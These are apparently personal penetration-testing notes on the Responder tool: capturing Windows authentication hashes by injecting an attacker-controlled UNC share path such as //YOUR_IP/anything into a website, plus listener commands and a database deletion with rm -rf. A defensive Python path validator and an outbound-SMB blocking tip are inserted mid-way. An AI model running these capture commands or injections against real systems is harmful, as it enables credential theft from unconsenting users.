Responder
You can use Responder (5.0k stars) to catch Windows authentication requests, which lets you grab hashes and passwords.
For instance, a website may be using SMB to access some shares based on the user input. If we inject a share leading to our machine, we may be able to grab the credentials used to connect to the share.
$ sudo responder -I tun0
$ sudo responder -i IP -I tun0
Logs are stored at: /usr/share/responder/logs.
Following the previous example, we inject //YOUR_IP/anything. If the website is configured to use the current user's credentials to connect to the share, you will receive them and will have to crack them.
It works with SMB, LDAP, etc.
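Seen from the defending side, the injection above works because the application hands a user-controlled path to the SMB client. The following Python code is an added example, not part of the original notes: it shows the vulnerable join beside a check that rejects UNC, drive and absolute paths. ALLOWED_ROOT, the function names and the 192.0.2.10 address are constructed for illustration.

```python
import ntpath
from urllib.parse import unquote

# Hypothetical share the application is supposed to read from (assumption).
ALLOWED_ROOT = r"\\fileserver01\public"


def naive_share_path(user_input: str) -> str:
    """Vulnerable pattern: join() discards ALLOWED_ROOT when the input
    carries its own UNC prefix, so the server connects to another host."""
    return ntpath.join(ALLOWED_ROOT, user_input)


def safe_share_path(user_input: str) -> str:
    """Return a path under ALLOWED_ROOT or raise ValueError."""
    name = unquote(user_input)  # undo one layer of URL encoding first
    drive, rest = ntpath.splitdrive(name)
    # A drive letter, a UNC prefix (\\host\share or //host/share) or a
    # leading separator means the caller chose the location; refuse it.
    if drive or rest[:1] in ("\\", "/"):
        raise ValueError("absolute, drive or UNC path rejected")
    root = ntpath.normpath(ALLOWED_ROOT)
    full = ntpath.normpath(ntpath.join(root, name))
    # Defence in depth: the normalised result must still sit under the root.
    if not full.lower().startswith(root.lower() + "\\"):
        raise ValueError("path escapes the allowed share")
    return full


if __name__ == "__main__":
    # Constructed inputs: one legitimate file name, three share injections.
    samples = [
        "reports/q1.pdf",
        "//192.0.2.10/anything",
        r"\\192.0.2.10\anything",
        "%2F%2F192.0.2.10%2Fanything",
    ]
    for s in samples:
        print("naive:", naive_share_path(s))
        try:
            print("safe: ", safe_share_path(s))
        except ValueError as exc:
            print("safe:  rejected,", exc)
```

Blocking outbound SMB (TCP 445) from the web server is the complementary network control, since it stops the authentication attempt even if a path check is missed.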
To-do
Stuff that I found but have never read or used yet.
Passive Network Discovery
$ sudo responder -I tun0 -A
$ sudo responder -I tun0 -wdF -b
$ sqlitebrowser /usr/share/responder/Responder.db
$ rm -rf /usr/share/responder/Responder.db